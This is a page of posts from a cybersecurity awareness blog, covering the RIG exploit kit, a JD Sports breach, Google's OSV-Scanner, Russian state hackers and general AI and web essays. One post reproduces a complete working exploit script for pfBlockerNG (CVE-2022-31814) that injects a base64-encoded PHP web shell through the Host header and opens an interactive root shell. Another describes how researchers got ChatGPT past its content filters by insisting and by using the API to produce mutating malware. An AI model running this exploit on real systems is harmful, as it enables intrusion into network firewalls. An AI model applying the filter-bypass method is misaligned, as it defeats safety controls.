Wednesday, January 15, 2025
Home Blog Page 5

Enterprise users infected by RIG Exploit Kit thanks to Internet Explorer

By
RiSec.Mitch
-
0

The RIG Exploit Kit is currently in the midst of its most productive phase, attempting approximately 2,000 incursions everyday and succeeding in about 30% of them, the best success rate in the long operational history of the service.

RIG EK has been observed distributing several malware families, including Dridex, SmokeLoader, and RaccoonStealer, by taking use of relatively outdated Internet Explorer flaws.

The exploit kit continues to pose a serious, widespread threat to people and organisations, according to a thorough study by Prodaft, whose researchers have access to the service’s backend web panel.

RIG EK’s sordid history

RIG EK was first released eight years ago, in 2014, and promoted as an “exploit-as-a-service” rented to other malware operators to spread their malware on vulnerable devices.

The RIG exploit kit is a set of malicious JavaScript scripts embedded in compromised or malicious websites by the threat actors, which are then promoted through malvertising.

When a user visits these sites, the malicious scripts will be executed and attempt to exploit various vulnerabilities in the browser to install malware on the device automatically.

In 2015, the kit’s authors released the second major version of the kit, laying the ground for more extensive and successful operations.

In 2017 though, RIG suffered a significant blow following a coordinated takedown action that wiped out large parts of its infrastructure, severely disrupting its operations.

In 2019, RIG returned, this time focusing on ransomware distribution, helping Sodinokibi (REvil), Nemty, and ERIS ransomware, compromise organizations with data-encrypting payloads.

Current attack volumes

Prodaft says RIG EK currently targets 207 countries, launching an average of 2,000 attacks per day and having a current success rate of 30%. This rate was 22% before the exploit kit resurfaced with two new exploits, says Prodaft.

Infection attempts and successful intrusions for 2022 (Prodaft)

As the heatmap published in the report shows, the most impacted countries are Germany, Italy, France, Russia, Turkey, Saudi Arabia, Egypt, Algeria, Mexico, and Brazil. However, there are victims worldwide

Victims of RIG EK (Prodaft)

The highest success rate is brought by CVE-2021-26411, achieving a 45% successful exploitation ratio, followed by CVE-2016-0189 with 29% and CVE-2019-0752 with 10%.

Exploits used by RIG EK, and their success ratio (Prodaft)

“The RIG administrator had taken additional manual configuration steps to ensure that the malware was distributed smoothly,” explains Prodaft in the report.

“Considering all these facts, we assess with high confidence that the developer of Dridex malware has a close relationship with the RIG’s admins.”

RIG EK breaches may result in data-encryption issues, as Dridex was previously connected to Entropy ransomware outbreaks.

The RIG EK continues to pose a serious threat to people and companies running out-of-date software, threatening to infect their computers with sly data thieves that can steal highly-sensitive information.

Nevertheless, because Microsoft officially terminated Internet Explorer in February 2023 and redirected users to Microsoft Edge, RIG EK’s emphasis on Internet Explorer may cause the service to quickly become out of date.

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

The Rise and Rise of AI

By
Steven Black (n0tst3)
-
0
Cybersecurity

One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come into the spotlight. Artificial intelligence (AI) has completely changed how we live, work, and interact with the world around us, from virtual personal assistants to self-driving cars. We will examine the emergence of AI, its effects on many businesses, and the difficulties it poses in this post.

The Emergence of AI

The idea of artificial intelligence (AI) first emerged in the middle of the 20th century when academics looked at how to reproduce human intelligence in machines. Modern AI was created as a result of substantial developments in the decades that followed in disciplines including machine learning, natural language processing, and computer vision.

AI applications have increased dramatically in recent years as a result of the growth of big data and improvements in computing power. Today, artificial intelligence (AI) is used in a wide range of sectors, from manufacturing and transportation to healthcare and finance.

Impact on Industries

The impact of AI on various industries has been significant. In healthcare, for example, AI is being used to help diagnose diseases, analyze medical images, and develop personalized treatment plans. In finance, AI is being used to analyze large volumes of data to identify patterns and make more accurate predictions.

In manufacturing, AI is being used to automate repetitive tasks and improve efficiency. For example, AI-powered robots are being used to perform assembly line tasks, while AI algorithms are being used to optimize production schedules and reduce waste.

In transportation, AI is being used to develop autonomous vehicles that can operate more safely and efficiently than human-driven vehicles. These vehicles are equipped with sensors and cameras that can detect obstacles, and they use AI algorithms to make decisions about how to navigate through traffic.

Improved data analysis capabilities with greater ability to predict potential outcomes. Optimisation of business processes as well as innovation in current and new products. AI will be able to provide customers with higher levels of personalised services. The aim being to increase engagement and improve their 

Challenges

Despite its many benefits, AI also presents a number of challenges. One of the biggest challenges is the potential for job displacement. As AI becomes more advanced, there is a risk that many jobs will become automated, leading to significant job losses in certain industries.

Another challenge is the potential for bias in AI systems. AI algorithms are only as unbiased as the data they are trained on, and if that data is biased, the algorithm will be biased as well. This can lead to discriminatory outcomes, particularly in areas such as hiring and lending.

Finally, there is the challenge of regulation. As AI becomes more advanced, there is a need for clear regulations to ensure that it is developed and used in an ethical and responsible manner.

Is AI Here to Say

I think it’s a silly question, today in 2023. AI can be found in more places than not when it comes to Technology. From Home Automation/Use Cases to Supporting the Role of Internet of Medical Things to chatbots.. you name it AI is everywhere.

Did you know, we now consume Safer & cheaper food thank’s to AI. How is your food safer and less expensive thanks to artificial intelligence? In two words “Crop disease detection using machine learning,”. Oops! That was unquestionably more than two. Deep learning techniques can be used to train computer vision or camera-based systems for image-based plant disease identification and patch detection. Image-based plant disease detection and patch detection.

Conclusion

From its infancy to its widespread use across numerous industries, the emergence of AI has been a wonderful journey. New opportunities and problems will undoubtedly arise as AI develops and becomes more sophisticated. To fully achieve AI’s potential to enhance our lives and the world around us, it is up to us to make sure that we create and utilise it in a responsible and ethical manner.

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Evolution of The World Wide Web (WWW)

By
Steven Black (n0tst3)
-
0
Cybersecurity

The World Wide Web (WWW) has arguanble gone through mind-blowing ammounts transformation since its inception in 1989. From a modest idea for sharing information among scientists to a revolutionary platform for global communication and commerce, the WWW has radically transformed the way we live, work, and play. In this captivating blog post, we’ll take a riveting journey through the evolution of the WWW and uncover how it has revolutionized the world as we know it. Buckle up and get ready to embark on an incredible ride!

The Early Days of the WWW

The idea for the WWW was first proposed by Tim Berners-Lee, a British computer scientist, in 1989. At the time, Berners-Lee was working at CERN, the European Organization for Nuclear Research, and he wanted to create a system that would allow scientists to share information and collaborate more easily. He developed the first web server, the first web browser, and the first web pages, all of which were based on a simple language called HTML (Hypertext Markup Language).

In the early days of the WWW, there were only a few hundred websites, and most of them were hosted on servers located in the United States and Europe. These websites were primarily focused on academic research and information sharing, and the idea of using the web for commercial purposes had not yet taken hold.

The Rise of the Dot-Com Era

In the mid-1990s, the WWW began to explode in popularity as more and more people started to use it for communication and commerce. This was the era of the dot-com boom, and companies like Amazon, Google, and Yahoo were founded on the idea of using the web to create new business models.

During this time, the web became more interactive and dynamic, with the introduction of technologies like JavaScript and Flash that allowed for more engaging and interactive web experiences. This led to the development of new types of websites, such as online marketplaces, social networks, and multimedia platforms.

The Mobile Revolution

In the early 2000s, the rise of mobile devices like smartphones and tablets changed the way people accessed the web. Mobile devices required websites to be optimized for smaller screens and slower connections, which led to the development of responsive web design and mobile-first approaches to web development.

This shift towards mobile devices also led to the development of new types of web-based applications, such as mobile apps and progressive web apps (PWAs), which are designed to work seamlessly across different devices and platforms.

The Future of the Web

As we look to the future, it’s clear that the web will continue to evolve and change in response to new technologies and user needs. Some of the key trends that are likely to shape the future of the web include:

  • The continued growth of mobile and other connected devices, such as smart homes and wearable technology
  • The increasing use of artificial intelligence and machine learning to create more personalized and intelligent web experiences
  • The rise of blockchain and other decentralized technologies, which could lead to new models for content creation and distribution on the web
  • The development of new types of interfaces and user experiences, such as voice-based interactions and virtual and augmented reality

In conclusion, the evolution of the WWW has been a fascinating journey, from its humble beginnings as a simple tool for sharing information among scientists to a global platform that connects people and businesses around the world. As we look to the future, it’s clear that the web will continue to evolve and change, and it will be exciting to see how it develops in the years to come.

Suggest an edit to this article

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Cybersecurity Knowledge Base

Homepage

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

pfBlockerNG 2.1.4_26 – (RCE) Remote Code Execution

By
Steven Black (n0tst3)
-
0

A Remote Code Execution Vulnerability was discovered in pfBlockerNG 2.1.4_26 by Security Researcher(s) @IHTeam






# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: http[s]://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: http[s]://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: https][://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: http[s]://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
 
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()
 
url = args.url
shell_filename = "system_advanced_control.php"
 
def check_endpoint(url):
	response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
	if response.status_code == 200:
		print("[+] pfBlockerNG is installed")
	else:
		print("\n[-] pfBlockerNG not installed")
		sys.exit()
 
def upload_shell(url, shell_filename):
	payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
	print("[/] Uploading shell...")
	response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
	time.sleep(2)
	response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
	if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
		print("[+] Upload succeeded")
	else:
		print("\n[-] Error uploading shell. Probably patched ", response.content)
		sys.exit()
 
def interactive_shell(url, shell_filename, cmd):
	response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
	print(str(response.text)+"\n")
 
 
def delete_shell(url, shell_filename):
	delcmd = "rm /usr/local/www/system_advanced_control.php"
	response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
	print("\n[+] Shell deleted")
 
check_endpoint(url)
upload_shell(url, shell_filename)
try:
	while True:
		cmd = input("# ")
		interactive_shell(url, shell_filename, cmd)
except:
	delete_shell(url, shell_filename)
            





Suggest an edit to this article





Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!





Cybersecurity Knowledge Base





Homepage





Remember, CyberSecurity Starts With You!





    

  • Globally, 30,000 websites are hacked daily.
    • 




  • 64% of companies worldwide have experienced at least one form of a cyber attack.
    • 




  • There were 20M breached records in March 2021.
    • 




  • In 2020, ransomware cases grew by 150%.
    • 




  • Email is responsible for around 94% of all malware.
    • 




  • Every 39 seconds, there is a new attack somewhere on the web.
    • 




  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
    • 



Bookmark 
Please login to bookmarkClose
	            

            


        


        
        

            

                
Google Open-Source Vulnerability Scanning Tool

                

	                                    
By
 RiSec.Mitch
 - 
 
                                        
0
                


                
google

	            

		            

The Open Source Vulnerability (OSV) database’s front-end interface, OSV-Scanner, was made available by Google in December 2022. The OSV database is a distributed, open-source database that keeps OSV-formatted vulnerability data. By comparing a project’s dependencies to the OSV database, the OSV-Scanner determines all vulnerabilities that pertain to the project.





OSV-Scanner first ascertains all the dependencies that are in use by inspecting manifests, software bill of materials (SBOMs), and commit hashes when it is executed on a project. 





This data is used to query the OSV database and talk about any project-related vulnerabilities. 





Vulnerabilities are disclosed in tabular style or, optionally, in the OSV format, which is based on JSON.





The OSV format provides a machine-readable JSON schema for presenting vulnerability information. The format is designed to enforce version specification that aligns with the naming and schemes used in the actual open-source package. Oliver Chang, senior staff engineer at Google, and Russ Cox, distinguished engineer at Google, state that this approach “can be used to describe vulnerabilities in any open source ecosystem, while not requiring ecosystem-dependent logic to process them.”





Osv-scanner -r /path/to/your/dir 





searches a directory for lockfiles, SBOMs, and git folders. A recursive scan is enabled via the optional -r flag. Package URL-based SBOMs for SPDX and CycloneDX are currently supported. Several lockfiles, including yarn.lock, composer.lock, go.mod, and Gemfile.lock, are currently supported.





It is also possible to scan the list of installed packages in a Debian image to pull out any vulnerabilities for them: $ osv-scanner --docker image_name:latest. This requires docker to be installed and does not currently scan the filesystem of the Docker container. More details on this preview feature can be found in the GitHub issue.





OSV-Scanner can be configured to ignore vulnerabilities by their ID. This feature also supports optionally providing a date for when the ignore will expire and a reason. Ignored vulnerabilities are specified under the IgnoreVulns key.





OSV-Scanner has also been integrated into the OpensSSF Scorecard’s Vulnerabilities check. Scorecards is an automated security tool that identifies risky supply chain practices in open-source projects. This extends Scorecards analysis from the project’s direct vulnerabilities to also include any vulnerabilities within the project’s dependencies.





Rex Pan, software engineer at Google, shared some details on what is next for OSV-Scanner. The team is looking to offer a standalone CI action to enable further integration into workflows. Pan shared that they are looking to improve C and C++ support by “building a high quality database of C/C++ vulnerabilities by adding precise commit level metadata to CVEs.”





OSV-Scanner is available via GitHub under the Apache License 2.0. More details on the announcement can be found in the release blog post.





Suggest an edit to this article





Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!





Cybersecurity Knowledge Base





Homepage





Remember, CyberSecurity Starts With You!





    

  • Globally, 30,000 websites are hacked daily.
    • 




  • 64% of companies worldwide have experienced at least one form of a cyber attack.
    • 




  • There were 20M breached records in March 2021.
    • 




  • In 2020, ransomware cases grew by 150%.
    • 




  • Email is responsible for around 94% of all malware.
    • 




  • Every 39 seconds, there is a new attack somewhere on the web.
    • 




  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
    • 



Bookmark 
Please login to bookmarkClose
	            

            


        


        
        

            

                
The Shadow Warriors: The Rise of Russian State Hackers

                

	                                    
By
 Steven Black (n0tst3)
 - 
 
                                        
0
                


                
	            

		            

Hacking is a shadowy world, with shadowy characters working behind the scenes to gain access to sensitive information and cause chaos. But when it comes to state-sponsored hacking, one group stands out – Russian state hackers.





In recent years, the rise of Russian state hackers has become a major concern for governments and organizations around the world. These groups are believed to be working on behalf of the Russian government, using their skills to gather intelligence, interfere in elections, steal valuable data, and, more recently, wage cyber-warfare in corre





So, who are these shadow warriors, and what makes them so dangerous?





    

  • Skill and expertise: Russian state hackers are some of the most skilled and advanced in the world. They use cutting-edge techniques and tools to gain access to sensitive information and systems, making it difficult for security experts to defend against them.
    • 




  • Stealth and cunning: Russian state hackers are known for their ability to operate in the shadows, using stealth and cunning to avoid detection and evade the authorities. They use tactics such as spear-phishing, social engineering, and malware attacks to gain access to sensitive information.
    • 




  • State backing: Perhaps the most dangerous aspect of Russian state hackers is the support they receive from the Russian government. With the full backing of the state, they have access to resources, technology, and information that other hacking groups could only dream of.
    • 






The consequences of a successful attack by Russian state hackers can be devastating. For example, the 2016 US presidential election was heavily influenced by Russian state hackers, who used stolen data and propaganda to interfere in the election process. More recently, Russian state hackers have been accused of targeting major corporations and stealing sensitive data and intellectual property.





Another historical example, on December 23, 2015, the power grid in two western oblasts of Ukraine was hacked, which resulted in power outages for roughly 230,000 consumers in Ukraine for 1-6 hours. The attack took place during the ongoing Russo-Ukrainian War (2014-present) and is attributed to a Russian advanced persistent threat group known as “Sandworm“.It was the first publicly acknowledged successful cyberattack on a power grid





So, what can we do to protect ourselves from the threat of Russian state hackers? The answer is simple – be aware and be prepared. Organizations should invest in cybersecurity measures, such as firewalls, antivirus software, and two-factor authentication, to protect against attacks. Additionally, employees should be trained to recognize and avoid phishing scams and other tactics used by Russian state hackers.





In conclusion, the rise of Russian state hackers is a major concern for the digital world. Their skills, stealth, and state backing make them a formidable force that can cause serious damage. It’s up to us to be aware of the threat and take the necessary steps to protect ourselves and our information. The digital world is our reality, and it’s time to start treating it as such.







The Shadow Warriors: The Rise of Russian State Hackers









The Shadow Warriors: The Rise of Russian State Hackers







Suggest an edit to this article





Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!





Cybersecurity Knowledge Base





Homepage





Remember, CyberSecurity Starts With You!





    

  • Globally, 30,000 websites are hacked daily.
    • 




  • 64% of companies worldwide have experienced at least one form of a cyber attack.
    • 




  • There were 20M breached records in March 2021.
    • 




  • In 2020, ransomware cases grew by 150%.
    • 




  • Email is responsible for around 94% of all malware.
    • 




  • Every 39 seconds, there is a new attack somewhere on the web.
    • 




  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
    • 



Bookmark 
Please login to bookmarkClose
	            

            


        


        
        

            

                
“What Came First, Cyber or Security?”: The Timeless Debate That Shapes Our Digital World

                

	                                    
By
 Steven Black (n0tst3)
 - 
 
                                        
0
                


                
	            

		            

The digital world is constantly evolving, and with each new advancement comes a new set of challenges. One debate that has been ongoing for decades is the question of what came first, cyber or security? If you’ve ever asked yourself this question, then you’re in the right place. In this blog post, we’ll dive into the timeless debate that shapes our digital world and explore the relationship between cyber and security.





Imagine a world without the internet, computers, and smartphones. How would we communicate, store information, and access entertainment? The answer is simple – we wouldn’t. The use of technology, or what we call “cyber,” has revolutionized the way we live, work, and play. But as technology has advanced, so have the cyber threats that come with it. From hacking to phishing to malware attacks, the dangers of the digital world are very real. And that’s where security comes in.





Security refers to the practice of protecting computers, networks, and data from unauthorized access, use, disclosure, disruption, modification, or destruction. It’s the guardian angel of the digital world, ensuring that our sensitive information stays safe and secure. But the question remains – did cyber come first, and security followed in its wake, or was it the other way around?





In a sense, it’s a never-ending cycle. As technology advanced, the need for security measures grew. And as security measures were developed, technology continued to advance. It’s a chicken-and-egg scenario, and the debate may never be fully resolved. But what we do know is that cyber and security are intertwined and rely on each other to function effectively.





So, what does the future hold? As technology continues to evolve, the need for cybersecurity measures will only become more important. It’s crucial for individuals, businesses, and governments to prioritize and invest in cybersecurity to stay ahead of the constantly evolving threat landscape. The digital world is our reality, and it’s up to us to shape it for the better.





In conclusion, the debate of what came first, cyber or security, may never be fully resolved. But what we do know is that they are two sides of the same coin, and their relationship will shape the future of our digital world. Are you ready to take the leap into the digital future, with cyber and security by your side?





Suggest an edit to this article





Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!





Cybersecurity Knowledge Base





Homepage





Remember, CyberSecurity Starts With You!





    

  • Globally, 30,000 websites are hacked daily.
    • 




  • 64% of companies worldwide have experienced at least one form of a cyber attack.
    • 




  • There were 20M breached records in March 2021.
    • 




  • In 2020, ransomware cases grew by 150%.
    • 




  • Email is responsible for around 94% of all malware.
    • 




  • Every 39 seconds, there is a new attack somewhere on the web.
    • 




  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
    • 



Bookmark 
Please login to bookmarkClose
	            

            


        


        
        

            

                
JD Sports:  Cyber Attack affects 10 million customers

                

	                                    
By
 Steven Black (n0tst3)
 - 
 
                                        
0
                


                
databreach

	            

		            

Following a cyber-attack, sportswear retailer JD Sports warned that stored information about 10 million consumers may be in danger.





The business claimed that names, addresses, email addresses, phone numbers, order information, and the last four digits of bank cards were among the data that hackers “may have acquired.”





The information concerned purchases made online between November 2018 and October 2020.





Injured consumers were being contacted, according to JD Sports.










According to the group, the affected data was “minimal.” It noted that it didn’t have all of the payment card information and didn’t think the hackers had access to account passwords.





“We want to apologise to those customers who may have been affected by this incident,” said Neil Greenhalgh, chief financial officer of JD Sports. “Protecting the data of our customers is an absolute priority for JD.”





The attack related to online orders placed for the JD, Size?, Millets, Blacks, Scotts and MilletSport brands and it is understood it was detected by the company in recent days, but only the historical data was accessed.





The company said it was working with “leading cyber-security experts” and was engaging with the UK’s Information Commissioner’s Office (ICO) in response to the incident.





Mr Greenhalgh said affected customers were being advised “to be vigilant about potential scam e-mails, calls and texts”.





This isn’t the first incident for JD Sports, they suffered a data breach in 2021, affecting the personal and financial information of its customers. The breach was discovered by the company’s cybersecurity team, who immediately launched an investigation into the matter.





Suggest an edit to this article





Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!





Cybersecurity Knowledge Base





Homepage





Remember, CyberSecurity Starts With You!





    

  • Globally, 30,000 websites are hacked daily.
    • 




  • 64% of companies worldwide have experienced at least one form of a cyber attack.
    • 




  • There were 20M breached records in March 2021.
    • 




  • In 2020, ransomware cases grew by 150%.
    • 




  • Email is responsible for around 94% of all malware.
    • 




  • Every 39 seconds, there is a new attack somewhere on the web.
    • 




  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
    • 



Bookmark 
Please login to bookmarkClose
	            

            


        


        
        

            

                
InfoSec – A Newbie Guide – InfoSecurity

                

	                                    
By
 Steven Black (n0tst3)
 - 
 
                                        
0
                


                
what is infosec
what is infosec

	            

		            

Information security, also known as cybersecurity, is the practice of protecting sensitive information from unauthorized access, use, disclosure, disruption, modification, or destruction. With the increasing amount of personal and business data being stored and shared online, information security has become a critical concern for individuals, organizations, and governments.





One of the biggest challenges in information security is the constantly evolving threat landscape. Hackers and cybercriminals are constantly developing new methods to gain access to sensitive information, and it’s important for organizations to stay up-to-date on the latest threats and take proactive measures to protect their data.





One of the most effective ways to protect against cyber threats is through the use of strong passwords and two-factor authentication. Strong passwords, which include a combination of letters, numbers, and special characters, are much more difficult for hackers to guess or crack. Two-factor authentication adds an extra layer of security by requiring users to provide a second form of verification, such as a fingerprint or code sent to a mobile phone, in addition to a password.





Another important aspect of information security is the use of encryption to protect sensitive information. Encryption is the process of converting plain text into a coded form that can only be accessed by someone with the decryption key. This ensures that even if sensitive information is intercepted, it will be unreadable to anyone without the key.





Another key component of information security is employee education and training. It is important to educate all employees about the risks of cyber attacks and the steps they can take to protect themselves and the organization. This includes training on how to identify phishing emails, how to handle sensitive information, and how to report any suspicious activity.





In addition, organizations should also have incident response plans in place to quickly and effectively respond to a cyber attack. This includes regular backups of important data, as well as a plan for restoring operations in the event of a disruption.





In conclusion, information security is a critical concern for individuals and organizations in today’s digital age. By taking a proactive approach to protecting sensitive information through the use of strong passwords, two-factor authentication, encryption, employee education, and incident response planning, organizations can reduce the risk of a successful cyber attack and protect their valuable data.





Did You Know?





    

  • Cybercrime is one of the fastest growing criminal activities in the world, with global losses estimated to reach $6 trillion annually by 2021.
    • 




  • Phishing is one of the most common methods used by cybercriminals to gain access to sensitive information, with more than 90% of all cyber-attacks starting with a phishing email.
    • 




  • The average cost of a data breach for a company is $3.86 million.
    • 




  • Small and medium-sized businesses are increasingly becoming targets for cybercriminals, as they often have weaker security measures in place.
    • 




  • The average time to detect a data breach is 206 days, and the average time to contain a data breach is 73 days.
    • 




  • The healthcare industry is one of the most targeted sectors for cyber attacks, due to the sensitive nature of the information stored in their systems.
    • 




  • The use of cloud-based services has led to an increase in the number of data breaches caused by third-party vendors.
    • 




  • The global cybersecurity workforce is expected to have 3.5 million unfilled jobs by 2021.
    • 




  • The use of artificial intelligence and machine learning is becoming increasingly important in the fight against cybercrime, as it allows for the automation of threat detection and response.
    • 




  • The Internet of Things (IoT) is creating new security challenges, as the increased number of connected devices provides more opportunities for cybercriminals to gain access to sensitive information.
    • 






Suggest an edit to this article





Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!





Cybersecurity Knowledge Base





Homepage





Remember, CyberSecurity Starts With You!





    

  • Globally, 30,000 websites are hacked daily.
    • 




  • 64% of companies worldwide have experienced at least one form of a cyber attack.
    • 




  • There were 20M breached records in March 2021.
    • 




  • In 2020, ransomware cases grew by 150%.
    • 




  • Email is responsible for around 94% of all malware.
    • 




  • Every 39 seconds, there is a new attack somewhere on the web.
    • 




  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
    • 



Bookmark 
Please login to bookmarkClose
	            

            


        


        
        

            

                
Polymorphic Malware Produced by ChatGPT

                

	                                    
By
 RiSec.Mitch
 - 
 
                                        
0
                


                
malware

	            

		            

OpenAI’s ChatGPT has reportedly created a new strand of polymorphic malware following text-based interactions with cybersecurity researchers at CyberArk.





The virus developed utilising ChatGPT may “easily circumvent security products and make mitigation difficult with very little effort or expenditure by the adversary,” according to a technical write-up that the business recently shared with Infosecurity.





Eran Shimony and Omer Tsarfati of CyberArk Security explain in their study that the initial stage in building the virus was to get past the content filters that were prohibiting ChatGPT from producing dangerous tools.





The CyberArk researchers merely insisted, asking the same question in a more authoritative manner, to accomplish this.





Shimony and Tsarfati noted that, “interestingly, we acquired a functioning code by requesting ChatGPT to execute the same thing utilising various restrictions and asking it to obey.”





Further, the researchers noted that when using the API version of ChatGPT (as opposed to the web version), the system reportedly does not seem to utilize its content filter.





“It is unclear why this is the case, but it makes our task much easier as the web version tends to become bogged down with more complex requests,” reads the CyberArk report.





Shimony and Tsarfati then used ChatGPT to mutate the original code, thus creating multiple variations of it.





“In other words, we can mutate the output on a whim, making it unique every time. Moreover, adding constraints like changing the use of a specific API call makes security products’ lives more difficult.”





Thanks to the ability of ChatGPT to create and continually mutate injectors, the cybersecurity researchers were able to create a polymorphic program that is highly elusive and difficult to detect.





“By utilizing ChatGPT’s ability to generate various persistence techniques, Anti-VM modules and other malicious payloads, the possibilities for malware development are vast,” explained the researchers.





“While we have not delved into the details of communication with the C&C server, there are several ways that this can be done discreetly without raising suspicion.”





CyberArk affirmed that they will further develop and expound on this research and that they planned to make some of the source code available for educational purposes.





The report comes days after Check Point Research discovered ChatGPT being used to develop new malicious tools, including infostealers, multi-layer encryption tools and dark web marketplace scripts.





Suggest an edit to this article





Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!





Cybersecurity Knowledge Base





Homepage





Remember, CyberSecurity Starts With You!





    

  • Globally, 30,000 websites are hacked daily.
    • 




  • 64% of companies worldwide have experienced at least one form of a cyber attack.
    • 




  • There were 20M breached records in March 2021.
    • 




  • In 2020, ransomware cases grew by 150%.
    • 




  • Email is responsible for around 94% of all malware.
    • 




  • Every 39 seconds, there is a new attack somewhere on the web.
    • 




  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
    • 



Bookmark 
Please login to bookmarkClose
	            

            


        


        
1...456...79Page 5 of 79
                        

                    

                            
 
    
 

 

    

                

            














Editor Picks
 





Featured





Cyber Academy























ABOUT US



RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education.
  Read more




Contact us: security@realinfosec.net






Social





Subscribe for weekly updates










Copyright ©  RiSec 2023 All rights reserved. 
All trademarks, logos, images and brand names are the property of their respective owners.